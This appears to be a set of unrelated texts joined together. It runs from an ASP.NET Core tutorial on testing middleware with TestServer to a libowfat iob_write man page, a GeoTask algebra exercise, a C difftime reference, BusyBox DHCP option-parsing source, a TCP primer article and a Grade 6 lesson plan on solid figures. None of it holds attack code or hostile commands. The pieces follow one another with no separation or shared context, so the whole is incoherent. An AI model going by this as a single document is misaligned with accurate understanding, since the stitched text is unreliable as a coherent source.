Middleware components are a fundamental part of an ASP.NET application, introduced from day one. They are executed in the order they are added on every request, and can be considered similar to the HTTP Handlers and HTTP Modules of classic ASP.NET. Since middleware can execute code before or after calling the subsequent component in the pipeline, it is considered ideal for plenty of varied application features, including exception handling, logging, authentication, etc.

Middleware can be tested in isolation with TestServer. It allows you to instantiate an app pipeline containing only the components that you need to test.

Advantages of TestServer

• Requests are sent in-memory instead of being serialized over the network.
• Exceptions in the middleware can flow directly back to the calling test.
• It's possible to customize server data structures, like HttpContext, directly within the test.

Middleware offers a powerful and flexible solution, and for that it needs to be tested! Thankfully there is a way to do that, so let's first see what we are going to test and then get right into it.

Example:

First, install the Microsoft.AspNetCore.TestHost package. Then configure the processing pipeline to use the middleware under test; part of the pipeline configuration is shown below.

[Fact]
public async Task MiddlewareTest_ReturnsNotFoundForRequest()
{
    using var host = await new HostBuilder()
        .ConfigureWebHost(webBuilder =>
        {
            webBuilder
                .UseTestServer()
                .ConfigureServices(services =>
                {
                    services.AddMyServices();
                })
                .Configure(app =>
                {
                    app.UseMiddleware<MyMiddleware>();
                });
        })
        .StartAsync();
}

After that, send requests with the HttpClient; sample code is below.
[Fact]
public async Task MiddlewareTest_ReturnsNotFoundForRequest()
{
    using var host = await new HostBuilder()
        .ConfigureWebHost(webBuilder =>
        {
            webBuilder
                .UseTestServer()
                .ConfigureServices(services =>
                {
                    services.AddMyServices();
                })
                .Configure(app =>
                {
                    app.UseMiddleware<MyMiddleware>();
                });
        })
        .StartAsync();

    var response = await host.GetTestClient().GetAsync("/");
}

Assert the result, starting with an assertion that is the opposite of the result you expect. An initial run with a false-positive assertion confirms that the test fails when the middleware is behaving correctly. Run the test and confirm that it fails.

In this example, the middleware returns a 404 (Not Found) status code when the root endpoint is requested. Make the first test run with Assert.NotEqual(), which should fail:

[Fact]
public async Task MiddlewareTest_ReturnsNotFoundForRequest()
{
    using var host = await new HostBuilder()
        .ConfigureWebHost(webBuilder =>
        {
            webBuilder
                .UseTestServer()
                .ConfigureServices(services =>
                {
                    services.AddMyServices();
                })
                .Configure(app =>
                {
                    app.UseMiddleware<MyMiddleware>();
                });
        })
        .StartAsync();

    var response = await host.GetTestClient().GetAsync("/");

    Assert.NotEqual(HttpStatusCode.NotFound, response.StatusCode);
}

Change the assertion to test the middleware under normal operating conditions. The final test uses Assert.Equal(). Run the test a second time to confirm that it passes.

[Fact]
public async Task MiddlewareTest_ReturnsNotFoundForRequest()
{
    using var host = await new HostBuilder()
        .ConfigureWebHost(webBuilder =>
        {
            webBuilder
                .UseTestServer()
                .ConfigureServices(services =>
                {
                    services.AddMyServices();
                })
                .Configure(app =>
                {
                    app.UseMiddleware<MyMiddleware>();
                });
        })
        .StartAsync();

    var response = await host.GetTestClient().GetAsync("/");

    Assert.Equal(HttpStatusCode.NotFound, response.StatusCode);
}

Send requests with HttpContext

A test app can also send a request using SendAsync(Action<HttpContext>, CancellationToken). In the following example, several checks are made when https://example.com/A/Path/?and=query is processed by the middleware.
[Fact]
public async Task TestMiddleware_ExpectedResponse()
{
    using var host = await new HostBuilder()
        .ConfigureWebHost(webBuilder =>
        {
            webBuilder
                .UseTestServer()
                .ConfigureServices(services =>
                {
                    services.AddMyServices();
                })
                .Configure(app =>
                {
                    app.UseMiddleware<MyMiddleware>();
                });
        })
        .StartAsync();

    var server = host.GetTestServer();
    server.BaseAddress = new Uri("https://example.com/A/Path/");

    var context = await server.SendAsync(c =>
    {
        c.Request.Method = HttpMethods.Post;
        c.Request.Path = "/and/file.txt";
        c.Request.QueryString = new QueryString("?and=query");
    });

    Assert.True(context.RequestAborted.CanBeCanceled);
    Assert.Equal(HttpProtocol.Http11, context.Request.Protocol);
    Assert.Equal("POST", context.Request.Method);
    Assert.Equal("https", context.Request.Scheme);
    Assert.Equal("example.com", context.Request.Host.Value);
    Assert.Equal("/A/Path", context.Request.PathBase.Value);
    Assert.Equal("/and/file.txt", context.Request.Path.Value);
    Assert.Equal("?and=query", context.Request.QueryString.Value);
    Assert.NotNull(context.Request.Body);
    Assert.NotNull(context.Request.Headers);
    Assert.NotNull(context.Response.Headers);
    Assert.NotNull(context.Response.Body);
    Assert.Equal(404, context.Response.StatusCode);
    Assert.Null(context.Features.Get<IHttpResponseFeature>().ReasonPhrase);
}

SendAsync allows direct configuration of an HttpContext object instead of using the HttpClient abstractions. Use SendAsync to control structures only available on the server, like HttpContext.Items or HttpContext.Features.

As with the previous example that tested for a 404 (Not Found) response, first check the opposite of every Assert statement in the preceding test. The check confirms that the test fails correctly when the middleware is working normally. After you've confirmed that the false-positive test works, set the final Assert statements to the expected conditions and values of the test. Run it again to verify that the test passes.

Conclusion

Using middleware unit testing you can test the parts of your code that are placed in the pipeline and get a more detailed picture of your testing results. With this approach you can customize data structures, like HttpContext, directly within the test, and you can verify both the failing and the passing side. We hope this blog is helpful for understanding the concept of unit testing a custom middleware in ASP.NET Core.
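As a complement to the TestServer approach above, middleware can also be unit tested without any host by invoking it directly with a DefaultHttpContext. A minimal sketch (MyMiddleware, its constructor parameter name, and its 404 behavior are assumptions carried over from the examples above):

using Microsoft.AspNetCore.Http;
using System.Threading.Tasks;
using Xunit;

public class DirectMiddlewareTests
{
    [Fact]
    public async Task Middleware_ReturnsNotFound_WithoutTestServer()
    {
        var context = new DefaultHttpContext();

        // Pass a no-op RequestDelegate as the 'next' component in the pipeline.
        var middleware = new MyMiddleware(next: (HttpContext ctx) => Task.CompletedTask);

        await middleware.InvokeAsync(context);

        Assert.Equal(404, context.Response.StatusCode);
    }
}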
libowfat/io/iob_write.3

.TH iob_write 3
.SH NAME
iob_write \- send I/O batch through callback
.SH SYNTAX
.B #include <iob.h>

typedef int64 (*io_write_callback)(int64 s,const void* buf,uint64 n);

int64 \fBiob_write\fR(int64 s,io_batch* b,io_write_callback cb);
.SH DESCRIPTION
iob_write sends the (rest of) \fIb\fR through the callback \fIcb\fR,
passing \fIs\fR as first argument. \fIcb\fR is expected to behave like
io_trywrite(2).

This interface is intended to send an I/O batch through a filter, for
example to encrypt or compress it. If you just want to send an I/O batch
to a socket, use iob_send instead.

iob_write returns the number of bytes written, 0 if there were no more
bytes to be written in the batch, -1 for EAGAIN, or -3 for a permanent
error (for example "connection reset by peer").

The normal usage pattern is using io_wait to know when a descriptor is
writable, and then calling iob_write until it returns 0, -1 or -3. If it
returns 0, terminate the loop (everything was written OK). If it returns
-1, call io_wait again. If it returned -3, signal an error.
.SH NOTE
iob_write will continue to call your callback until it returns an error.
So if you are in a state machine, for example a web server using this
for SSL support, make sure to write at most n bytes at a time (e.g. 64k)
and the next time you are called return -1. Otherwise iob_write might
not return until the whole file is served.
.SH "SEE ALSO"
iob_send(3)
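.SH EXAMPLE
The following sketch (not compile-tested) illustrates the usage pattern
described above. \fImywrite\fR is a hypothetical callback that wraps
io_trywrite and caps the chunk size as suggested in the NOTE; the
descriptor is assumed to have been registered with io_wantwrite first.
.nf
  static int64 mywrite(int64 s,const void* buf,uint64 n) {
    if (n>65536) n=65536;
    return io_trywrite(s,(const char*)buf,n);
  }

  for (;;) {
    int64 r=iob_write(s,&b,mywrite);
    if (r==0) break;                      /* everything written */
    if (r==-1) { io_wait(); continue; }   /* wait until writable */
    if (r==-3) { /* permanent error */ break; }
  }
.fi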
WHY GEOTASK?
• The learning process is entertaining and exciting
• The solved tasks turn into coordinates
• The chance to follow your progress
• Along with your schoolmates and friends, go on an adventure, searching for hideouts

1453.1. Conditioned inequality properties. Write the correct answer!

Simplify the inequality x - 3 > 4x - 3 (if every number fits, type R; if no number fits, type U)!

x <

Grade: 7
Subject: Algebra
Theme: Inequalities
Subtheme: Conditioned inequality concept

Solve tasks to find hidden Geo point coordinates

1. Geometry: Inner unilateral and cross angles, alternate interior angles, parallel straight lines, properties, and parallel signs.
2. Algebra: Linear function y = kx + b
3. Geometry: Angle, angle edges and peak, value, degree, measurement.
4. Geometry: Isosceles triangle, side edge, triangle basis, equilateral triangle, line segment mid-perpendicular, connection between angles and edges in a triangle
5. Algebra: Equivalent equations.
6. Geometry: Point belongs (or not) to the straight line (beam, line segment), half-plane, crossed straight lines, beam, opposite beams, line segment, properties.
7. Geometry: Equal figures, line segments, lengths, midpoints, distance between two points.
8. Algebra: Polynomial highest term.
9. Algebra: Equivalent inequalities
10. Algebra: Percent and proportions
11. Algebra: Numerical connections
12. Algebra: Numerical module
13. Algebra: Independent variable (argument) and dependent variable (function)
14. Algebra: Linear equations ax + b = 0, where a, b ∈ Q.
15. Algebra: Opposite type inequalities.
16. Geometry: Three point mutual arrangement.
17. Algebra: Point coordinates
18. Algebra: Degree with negative index
19. Algebra: Linear function y = kx + b
20. Algebra: Identical expressions.
21. Algebra: Numerical module
22. Geometry: Angle, angle edges and peak, value, degree, measurement.
23. Algebra: Direct proportionality concept
24. Algebra: Trinomial.
25. Algebra: Equivalent equations.
26. Algebra: Contracted multiplication formulas: addition and subtraction square; square difference.
27. Algebra: Polynomial normal form.
28. Algebra: Linear inequalities ax + b > 0, where a, b ∈ Q
29. Algebra: Point coordinates
30. Algebra: Mathematics expression. Algebraic expression.
31. Geometry: Inner unilateral and cross angles, alternate interior angles, parallel straight lines, properties, and parallel signs.
32. Algebra: Identical expressions.
33. Algebra: Linear inequalities ax + b > 0, where a, b ∈ Q
34. Algebra: Numerical equalities.
35. Algebra: Letter - variable.
36. Geometry: Point belongs (or not) to the straight line (beam, line segment), half-plane, crossed straight lines, beam, opposite beams, line segment, properties.
37. Algebra: Linear function y = kx + b
38. Algebra: Monomial (1st degree).
39. Algebra: Binomial.
40. Algebra: Identical expressions.
41. Geometry: Narrow, wide, straight, extended, opened, full angle. Equal angles, bisector.
42. Algebra: Conditioned inequality properties.
double difftime(time_t time1, time_t time0)

1.0 Reference

1.1 What this function does
It computes how much time1 and time0 differ.

1.2 Parameters
The definition of time_t:

typedef long int __time_t;
typedef __time_t time_t;

time_t represents the number of seconds elapsed from 1970-01-01 00:00:00 to some point in time; it is a relative time. time_t is a signed number, which means it can also be negative, representing a time before 1970-01-01 00:00:00.

1.3 Return value
Returns (double)(time1 - time0).

1.4 Usage example

#include <stdio.h>
#include <time.h>
#include <unistd.h>

int main()
{
    time_t startT = time(NULL);
    sleep(2);
    time_t endT = time(NULL);
    double deltaT = difftime(endT, startT);
    printf("Elapsed %f seconds\n", deltaT);
    return 0;
}

Compile with the gcc command ⤵︎

gcc -o test_time test.c

The output is as follows ⤵︎

Elapsed 2.000000 seconds
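1.5 A further example (my own sketch, not from the original page)
difftime also works with time_t values built from calendar dates via mktime:

#include <stdio.h>
#include <time.h>

int main()
{
    struct tm a = {0}, b = {0};
    a.tm_year = 2020 - 1900; a.tm_mon = 0; a.tm_mday = 1; a.tm_isdst = -1; /* 2020-01-01 */
    b.tm_year = 2020 - 1900; b.tm_mon = 0; b.tm_mday = 2; b.tm_isdst = -1; /* 2020-01-02 */
    double d = difftime(mktime(&b), mktime(&a));
    printf("Difference: %.0f seconds\n", d); /* 86400, assuming no DST change that night */
    return 0;
}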
/* vi: set sw=4 ts=4: */ /* * options.c -- DHCP server option packet tools * Rewrite by Russ Dill July 2001 */ #include "common.h" #include "dhcpd.h" #include "options.h" /* Supported options are easily added here */ const struct dhcp_option dhcp_options[] = { /* flags code */ { OPTION_IP | OPTION_REQ, 0x01 }, /* DHCP_SUBNET */ { OPTION_S32 , 0x02 }, /* DHCP_TIME_OFFSET */ { OPTION_IP | OPTION_LIST | OPTION_REQ, 0x03 }, /* DHCP_ROUTER */ { OPTION_IP | OPTION_LIST , 0x04 }, /* DHCP_TIME_SERVER */ { OPTION_IP | OPTION_LIST , 0x05 }, /* DHCP_NAME_SERVER */ { OPTION_IP | OPTION_LIST | OPTION_REQ, 0x06 }, /* DHCP_DNS_SERVER */ { OPTION_IP | OPTION_LIST , 0x07 }, /* DHCP_LOG_SERVER */ { OPTION_IP | OPTION_LIST , 0x08 }, /* DHCP_COOKIE_SERVER */ { OPTION_IP | OPTION_LIST , 0x09 }, /* DHCP_LPR_SERVER */ { OPTION_STRING | OPTION_REQ, 0x0c }, /* DHCP_HOST_NAME */ { OPTION_U16 , 0x0d }, /* DHCP_BOOT_SIZE */ { OPTION_STRING | OPTION_LIST | OPTION_REQ, 0x0f }, /* DHCP_DOMAIN_NAME */ { OPTION_IP , 0x10 }, /* DHCP_SWAP_SERVER */ { OPTION_STRING , 0x11 }, /* DHCP_ROOT_PATH */ { OPTION_U8 , 0x17 }, /* DHCP_IP_TTL */ { OPTION_U16 , 0x1a }, /* DHCP_MTU */ { OPTION_IP | OPTION_REQ, 0x1c }, /* DHCP_BROADCAST */ { OPTION_STRING , 0x28 }, /* nisdomain */ { OPTION_IP | OPTION_LIST , 0x29 }, /* nissrv */ { OPTION_IP | OPTION_LIST | OPTION_REQ, 0x2a }, /* DHCP_NTP_SERVER */ { OPTION_IP | OPTION_LIST , 0x2c }, /* DHCP_WINS_SERVER */ { OPTION_IP , 0x32 }, /* DHCP_REQUESTED_IP */ { OPTION_U32 , 0x33 }, /* DHCP_LEASE_TIME */ { OPTION_U8 , 0x35 }, /* dhcptype */ { OPTION_IP , 0x36 }, /* DHCP_SERVER_ID */ { OPTION_STRING , 0x38 }, /* DHCP_MESSAGE */ { OPTION_STRING , 0x3C }, /* DHCP_VENDOR */ { OPTION_STRING , 0x3D }, /* DHCP_CLIENT_ID */ { OPTION_STRING , 0x42 }, /* tftp */ { OPTION_STRING , 0x43 }, /* bootfile */ { OPTION_STRING , 0x4D }, /* userclass */ #if ENABLE_FEATURE_RFC3397 { OPTION_STR1035 | OPTION_LIST , 0x77 }, /* search */ #endif /* MSIE's "Web Proxy Autodiscovery Protocol" support */ { OPTION_STRING , 0xfc }, /* wpad */ /* Options below have no match in dhcp_option_strings[], * are not passed to dhcpc scripts, and cannot be specified * with "option XXX YYY" syntax in dhcpd config file. 
*/ { OPTION_U16 , 0x39 }, /* DHCP_MAX_SIZE */ { } /* zeroed terminating entry */ }; /* Used for converting options from incoming packets to env variables * for udhcpc stript */ /* Must match dhcp_options[] order */ const char dhcp_option_strings[] ALIGN1 = "subnet" "\0" /* DHCP_SUBNET */ "timezone" "\0" /* DHCP_TIME_OFFSET */ "router" "\0" /* DHCP_ROUTER */ "timesrv" "\0" /* DHCP_TIME_SERVER */ "namesrv" "\0" /* DHCP_NAME_SERVER */ "dns" "\0" /* DHCP_DNS_SERVER */ "logsrv" "\0" /* DHCP_LOG_SERVER */ "cookiesrv" "\0" /* DHCP_COOKIE_SERVER */ "lprsrv" "\0" /* DHCP_LPR_SERVER */ "hostname" "\0" /* DHCP_HOST_NAME */ "bootsize" "\0" /* DHCP_BOOT_SIZE */ "domain" "\0" /* DHCP_DOMAIN_NAME */ "swapsrv" "\0" /* DHCP_SWAP_SERVER */ "rootpath" "\0" /* DHCP_ROOT_PATH */ "ipttl" "\0" /* DHCP_IP_TTL */ "mtu" "\0" /* DHCP_MTU */ "broadcast" "\0" /* DHCP_BROADCAST */ "nisdomain" "\0" /* */ "nissrv" "\0" /* */ "ntpsrv" "\0" /* DHCP_NTP_SERVER */ "wins" "\0" /* DHCP_WINS_SERVER */ "requestip" "\0" /* DHCP_REQUESTED_IP */ "lease" "\0" /* DHCP_LEASE_TIME */ "dhcptype" "\0" /* */ "serverid" "\0" /* DHCP_SERVER_ID */ "message" "\0" /* DHCP_MESSAGE */ "vendorclass" "\0" /* DHCP_VENDOR */ "clientid" "\0" /* DHCP_CLIENT_ID */ "tftp" "\0" "bootfile" "\0" "userclass" "\0" #if ENABLE_FEATURE_RFC3397 "search" "\0" #endif /* MSIE's "Web Proxy Autodiscovery Protocol" support */ "wpad" "\0" ; /* Lengths of the different option types */ const uint8_t dhcp_option_lengths[] ALIGN1 = { [OPTION_IP] = 4, [OPTION_IP_PAIR] = 8, [OPTION_BOOLEAN] = 1, [OPTION_STRING] = 1, #if ENABLE_FEATURE_RFC3397 [OPTION_STR1035] = 1, #endif [OPTION_U8] = 1, [OPTION_U16] = 2, [OPTION_S16] = 2, [OPTION_U32] = 4, [OPTION_S32] = 4 }; /* get an option with bounds checking (warning, not aligned). */ uint8_t *get_option(struct dhcpMessage *packet, int code) { int i, length; uint8_t *optionptr; int over = 0; int curr = OPTION_FIELD; optionptr = packet->options; i = 0; length = sizeof(packet->options); while (1) { if (i >= length) { bb_error_msg("bogus packet, option fields too long"); return NULL; } if (optionptr[i + OPT_CODE] == code) { if (i + 1 + optionptr[i + OPT_LEN] >= length) { bb_error_msg("bogus packet, option fields too long"); return NULL; } return optionptr + i + 2; } switch (optionptr[i + OPT_CODE]) { case DHCP_PADDING: i++; break; case DHCP_OPTION_OVER: if (i + 1 + optionptr[i + OPT_LEN] >= length) { bb_error_msg("bogus packet, option fields too long"); return NULL; } over = optionptr[i + 3]; i += optionptr[OPT_LEN] + 2; break; case DHCP_END: if (curr == OPTION_FIELD && (over & FILE_FIELD)) { optionptr = packet->file; i = 0; length = sizeof(packet->file); curr = FILE_FIELD; } else if (curr == FILE_FIELD && (over & SNAME_FIELD)) { optionptr = packet->sname; i = 0; length = sizeof(packet->sname); curr = SNAME_FIELD; } else return NULL; break; default: i += optionptr[OPT_LEN + i] + 2; } } return NULL; } /* return the position of the 'end' option (no bounds checking) */ int end_option(uint8_t *optionptr) { int i = 0; while (optionptr[i] != DHCP_END) { if (optionptr[i] == DHCP_PADDING) i++; else i += optionptr[i + OPT_LEN] + 2; } return i; } /* add an option string to the options (an option string contains an option code, * length, then data) */ int add_option_string(uint8_t *optionptr, uint8_t *string) { int end = end_option(optionptr); /* end position + string length + option code/length + end option */ if (end + string[OPT_LEN] + 2 + 1 >= DHCP_OPTIONS_BUFSIZE) { bb_error_msg("option 0x%02x did not fit into the packet", string[OPT_CODE]); 
return 0; } DEBUG("adding option 0x%02x", string[OPT_CODE]); memcpy(optionptr + end, string, string[OPT_LEN] + 2); optionptr[end + string[OPT_LEN] + 2] = DHCP_END; return string[OPT_LEN] + 2; } /* add a one to four byte option to a packet */ int add_simple_option(uint8_t *optionptr, uint8_t code, uint32_t data) { const struct dhcp_option *dh; for (dh = dhcp_options; dh->code; dh++) { if (dh->code == code) { uint8_t option[6], len; option[OPT_CODE] = code; len = dhcp_option_lengths[dh->flags & TYPE_MASK]; option[OPT_LEN] = len; if (BB_BIG_ENDIAN) data <<= 8 * (4 - len); /* This memcpy is for processors which can't * handle a simple unaligned 32-bit assignment */ memcpy(&option[OPT_DATA], &data, 4); return add_option_string(optionptr, option); } } bb_error_msg("cannot add option 0x%02x", code); return 0; }
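/* Usage sketch (hypothetical caller, not part of this file; modeled on how
 * udhcp's client/server code builds packets - helper names may differ):
 *
 *   struct dhcpMessage packet;
 *   // ... fill in op, htype, hlen, xid, chaddr, and the magic cookie ...
 *   packet.options[0] = DHCP_END;
 *   add_simple_option(packet.options, DHCP_LEASE_TIME, htonl(lease_seconds));
 *   add_simple_option(packet.options, DHCP_SERVER_ID, server_ip);
 *   // get_option() is the read-side counterpart:
 *   uint8_t *opt = get_option(&packet, DHCP_REQUESTED_IP);
 */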
Networking 101: Understanding TCP, the Protocol
TCP In Plain English • September 17, 2008 • By Charlie Schluting

TCP is used everywhere, and understanding how TCP operates enables network and systems administrators to properly troubleshoot network communication issues. TCP is wonderfully complex, but don't worry: we aren't going to tell you to go read RFC 793. This is a gentle introduction, or demystification, if you will. In this edition of Networking 101, we'll cover the TCP protocol, in only as much detail as necessary to understand the second part. You'll become familiar with enough terminology, you'll understand the components of the TCP header, and then next week we'll discuss "TCP in the wild," which will focus on examining some common issues with TCP, including window scaling problems, congestion, and of course the mechanics of a TCP connection.

We sometimes hear people call it "the TCP/IP protocol suite," which means that they're talking about layers 1-4 plus 7, similar to how we presented layers. TCP lives at layer 4, along with its unreliable friend UDP. TCP stands for Transmission Control Protocol, by the way.

Remember the header picture from the IP article? When a packet is encapsulated, we'll of course have the IP header at layer 3, and immediately following is the TCP header, which becomes the "data" for the IP header. TCP includes its own jargon, just like everything else. There were Ethernet frames, IP datagrams, and now TCP segments. You can think of them all as packets, but be sure to use the correct terms when communicating with others.

While trying to think of other things people say about TCP, it seemed apropos to spend some time explaining what they are trying to tell you. There's nothing worse than asking a guru a question and getting a response like "well, it's end-to-end." If you knew TCP you'd know what this meant, but then you wouldn't have asked the question in the first place. Let's see what we can do about that.

Yes, TCP is end-to-end. There is no concept of broadcast, or anything like it. To speak TCP with another computer, you must be connected, like a telephone call, so each end is prepared to talk. "Stream delivery" is another phrase you'll hear. This simply means that TCP works with data streams, and out-of-order packets are OK. In fact, TCP is even OK with lost or corrupted packets; it will eventually get them again. More likely you'll hear a programmer talking about streams, referring to the fact that it's hard to tell when data is actually going to be sent, and that you can send unstructured data down a TCP stream. TCP can buffer things in weird ways that sometimes don't make sense, but neither programmers nor users need to worry about that.

Whenever a TCP packet is sent, an acknowledgment, or ACK, is returned. This is really the only way to provide a reliable protocol: you must let the other side know if you have received things. Of course, people will want to improve on an inefficient system like this. Enter "piggybacking ACKs" into the picture. People call TCP "full duplex" because of piggybacking, because it lets both sides send data at the same time.
This is accomplished by carrying the ACK for the previously received packet within the current packet, piggybacked. In terms of preserving network utilization, this is much better than sending an entirely separate packet just to say "got it." Finally, there's the concept of a cumulative ACK: ACKing more than one packet at a time, to say "I got all the others, including this one."

In IP we dealt with individual packets being part of a larger IP datagram. Remember, a TCP segment is an individual TCP packet. TCP is a stream, so there isn't really any other concept to worry about aside from a "connection." Maximum Segment Size, or MSS, is negotiated at connection time, but almost always changes. The default MSS is 536, which is 576 (the IP guaranteed minimum packet size) minus 20 bytes for the IP header and 20 bytes for the TCP header. TCP tries to avoid causing IP-level fragmentation, so it will almost always start with 536.

The sexiest feature of TCP still remains: the Sliding Window Protocol. The window is essentially the amount of un-ACKed data that has been sent, and it can grow and shrink at will. This gets really interesting, and will be covered next time.

The header of a TCP packet is 20 bytes, just like IP's. Both IP and TCP headers can get larger if options are used. TCP does not include an IP address; it only needs to know about the port on which to connect. Don't let this confuse you, though: TCP keeps track of end-to-end connections in a state table that includes IP addresses and ports. It's just that the TCP header doesn't need the IP information, since it comes from IP. It is easier to think of a packet as a stream, one byte after the next. Everyone always wants to show a table for the header, but this can confuse matters more. The TCP header, starting with the first bit, is as follows (a C struct sketch of this layout appears at the end of the article):

• Source port, 16 bits: my local TCP port that's used for this connection
• Destination port, 16 bits: the remote machine's TCP port that I'm talking to
• Sequence number, 32 bits: the number used to keep track of packet ordering
• Acknowledgment number, 32 bits: the previously received sequence number that we're ACKing
• Header length, 4 bits: the number of 32-bit words in the header. This is set to five if no options are used
• Reserved, 6 bits: reserved for future use
• Flags, 6 bits total, each flag is one bit (on or off):
  • URG: urgent field pointer
  • ACK: this packet is (or includes) an ACK
  • PSH: push function (not used)
  • RST: reset, or terminate the connection
  • SYN: synchronization packet, aka Start Connection
  • FIN: final packet, start hang-up sequence
• Window size, 16 bits: begins with the ACK field that the receiving side will accept
• Checksum, 16 bits: a checksum of the TCP header and data
• Urgent pointer, 16 bits: an offset from the sequence number that points to the data following URG data
• Options: MSS, window scale, and more. This is mostly the focus of our next installment on TCP.

Each side of the TCP connection uses the two pairs of IP address and port to identify the connection, and sends the data on to the application that is listening on the port. And that's all there is. Just kidding: there's tons more to know about TCP. Come back next week to learn how all of these features interact, and discover even more about TCP.

In a Nutshell

• TCP is the most frequently used protocol, and lives at layer 4 in the protocol stack.
• TCP provides congestion control, reliability, and a stream on which to send data.
• To be efficient, TCP tries to send as much data as possible before getting an ACK back.

Article courtesy of Enterprise Networking Planet
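As promised in the header walk-through above, here is a rough C sketch of the fixed 20-byte layout (illustrative only; real code must also mind network byte order and the exact bit-level packing of the length, reserved, and flag fields):

#include <stdint.h>

/* Sketch of the fixed 20-byte TCP header; multi-byte fields are in network byte order. */
struct tcp_header {
    uint16_t source_port;
    uint16_t dest_port;
    uint32_t seq_number;
    uint32_t ack_number;
    uint8_t  data_offset;    /* header length in 32-bit words (upper 4 bits) + reserved bits */
    uint8_t  flags;          /* remaining reserved bits + URG, ACK, PSH, RST, SYN, FIN */
    uint16_t window_size;
    uint16_t checksum;
    uint16_t urgent_pointer;
    /* options, if any, follow here */
};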
Detailed Lesson Plan In Mathematics VI

I. Objectives:
At the end of the class, 100% of the students should be able to learn 75% of the lesson and be able to:
a. Visualize and describe the different solid figures (M6GE-IIIa-28)
b. Identify the faces, vertices and edges of a solid figure (M6GE-IIIb-30)
c. Display cooperativeness during the group activity

II. Subject Matter:
a. Topic: Solid Figures
b. References: K-12 MELCS 6 p. 224, ecosia.org, https://www.academia.edu
c. Materials: Pictures, real objects, flash cards, laptop
d. Values: Active participation, cooperation

III. Procedure:

A. Preliminary Activities
1. Prayer
Teacher: Let us stand and pray.
Students: In the name of the Father and of the Son and of the Holy Spirit. Amen!
2. Greeting
Teacher: Good morning, children.
Students: Good morning, Ma'am Nana.
Teacher: You may now take your seats.
Students: Thank you, Ma'am Nana.
3. Checking of Attendance
Teacher: Is anyone absent today?
Students: None, Ma'am Nana.
Teacher: Very good!
4. Classroom Management
Teacher: Can you please sit properly so we can start our lesson today?

B. Preparatory Activities:
1. Drill: Guess who I am! My name is given in the box below. Oops! The spelling of my name is jumbled up. Try to identify it from the clues given below and write it in the blank space.

_________ (1) I am a solid with two congruent circular bases that are parallel. (cylinder)
_________ (2) I am a prism whose faces are all squares. (cube)
_________ (3) I look like a marble but have no vertex. (sphere)
_________ (4) I am a solid whose base is polygonal and whose other faces are triangles. (pyramid)

CLINYDER

2. Review
Teacher: Yesterday we differentiated plane figures from solid figures. (Call a student who wants to answer the given figures.) Circle the 3D shapes (solid figures) and check the 2D shapes (plane figures).
Students: Yes, Ma'am! (Pupils will do the board work.)

C. Developmental Activities:
1. Activity
Teacher: I have here a big box. Inside this box are different shapes. All you have to do is pick one shape from the box and tell everyone what kind of shape you picked. Is that clear?
Students: Yes, Ma'am!
Teacher: So who wants to pick first from my big box? Anyone?
Students: Cube. Sphere. Cone. Cylinder.

2. Analysis
Teacher: Can you guess what our lesson is for today?
Students: Solid figures, Ma'am.
Teacher: Very good! So how will we describe a solid figure? I have here a box. (Show them a big box.) What is the shape of the bottom part of the box?
Students: Rectangle.
Teacher: Is it the same as the shape of the top part?
Students: Yes!
Teacher: What is the shape of the right side of the box?
Students: Square.
Teacher: Does it have the same shape as the one on the left side?
Students: Yes!
Teacher: Do the back and front sides of the box have the same shape?
Students: Yes!
Teacher: So how many faces does the box have?
Students: 6 faces, Ma'am.
Teacher: Very good! How many edges does the box have?
Students: 12 edges, Ma'am.
Teacher: Very good! How about vertices? How many vertices does the box have?
Students: 8 vertices.
Teacher: Very good! Thus the box is a three-dimensional object?
Students: Yes!
Teacher: Why is yes your answer?
Students: Because it has length, width and height.
Teacher: Very good! So how will we describe a solid figure?
Students: A solid figure is a three-dimensional object: it has length, width and height.
Teacher: Very good! So class, this means that this box is a solid figure called a rectangular prism, because of its rectangular base; it has the 6 faces, 8 vertices and 12 edges that you mentioned a while ago. So what is a prism? Who wants to read? (One student will read the definition of a prism.)
Students: A prism is a polyhedron that has two congruent parallel faces called bases.
Teacher: When we say polyhedron, this means a solid figure whose sides are polygons. Each side is called a face.
Two faces that intersect in a line segment form an edge, and two edges that intersect at a point form a vertex. (The teacher points out the faces, edges and vertices on the box.) A prism is a polyhedron that has two congruent parallel faces called bases; when we say "two congruent parallel faces called bases," this means two identical bases aligned on both sides. Can you follow?
Students: Yes, Ma'am.
Teacher: I have here some prisms that are named according to the shape of their bases.

Name | Shape of the base | Number of lateral faces | Definition
Triangular prism | triangle | 3 | Composed of two triangular bases and three rectangular lateral faces.
Rectangular prism | rectangle | 4 | Composed of two rectangular bases and four rectangular lateral faces.
Cube | square | 4 | A cube is a prism with a square base; all its faces are squares.
Pentagonal prism | pentagon | 5 | Has two pentagonal bases and five rectangular lateral faces.

The lateral faces are the faces that join the bases of a solid figure. Always remember that each face is a polygon. Is that clear?
Students: Yes, Ma'am.
Teacher: I have here another solid figure. Can you tell me the name of this solid figure? Here are the clues; observe the figure:
1. The sides are all polygons.
2. The figure is a prism.
3. Its bases are hexagons.
What would be the answer?
Students: The figure is a hexagonal prism.
Teacher: How many faces? How many edges? How many vertices?
Students: 8 faces, 18 edges, 12 vertices.
Teacher: Another solid figure is the pyramid, which is also named according to the shape of its base. Please read the definition of a pyramid. (One student will read the definition of the pyramid.)
Students: A pyramid is a polyhedron whose base is a polygon and whose lateral faces are triangles.
Teacher: That is to say, while a prism has two equal bases, a pyramid has only one base, and its lateral faces are triangles. Is that clear?
Students: Yes, Ma'am.
Teacher: Here are some examples of pyramids, named according to the shape of the base.

Name | Shape of the base | Number of lateral faces
Triangular pyramid | triangle | 3
Rectangular pyramid | rectangle | 4
Square pyramid | square | 4

Is that clear?
Students: Yes, Ma'am.
Teacher: Can you name the figure? Count the number of faces, edges and vertices. Here are the clues:
1. The lateral faces are all triangles.
2. The figure is a pyramid.
3. The base is a square.
What would be the answer?
Students: The figure is a square pyramid. It has 5 faces, 8 edges and 5 vertices.
Teacher: Very good! Other solid figures have curved surfaces.

Name | Definition
Cylinder | Has two circular bases that are congruent and parallel.
Cone | Has one circular base.
Sphere | Is a curved surface of points that are all the same distance from the center.

3. Abstraction
Teacher: What is a solid figure?
Students: A solid figure is a three-dimensional object: it has length, width and height.
Teacher: Very good! Can you give me some examples of solid figures?
Students: Hexagonal prism, rectangular prism, triangular prism, square pyramid, cone, sphere, cylinder, etc.
Teacher: Okay, very good!

4. Application
(The class will be grouped into 4 groups.)
Teacher: What should we do when doing an activity?
Students: 1. Be quiet. 2. Participate in the group activity.
Teacher: Very good, children.

A. Activity group 1: Identify what kind of solid figure each picture shows.
1. ____________ (cube)
2. ____________ (cylinder)
3. ____________ (rectangular prism)
4. ____________ (sphere)

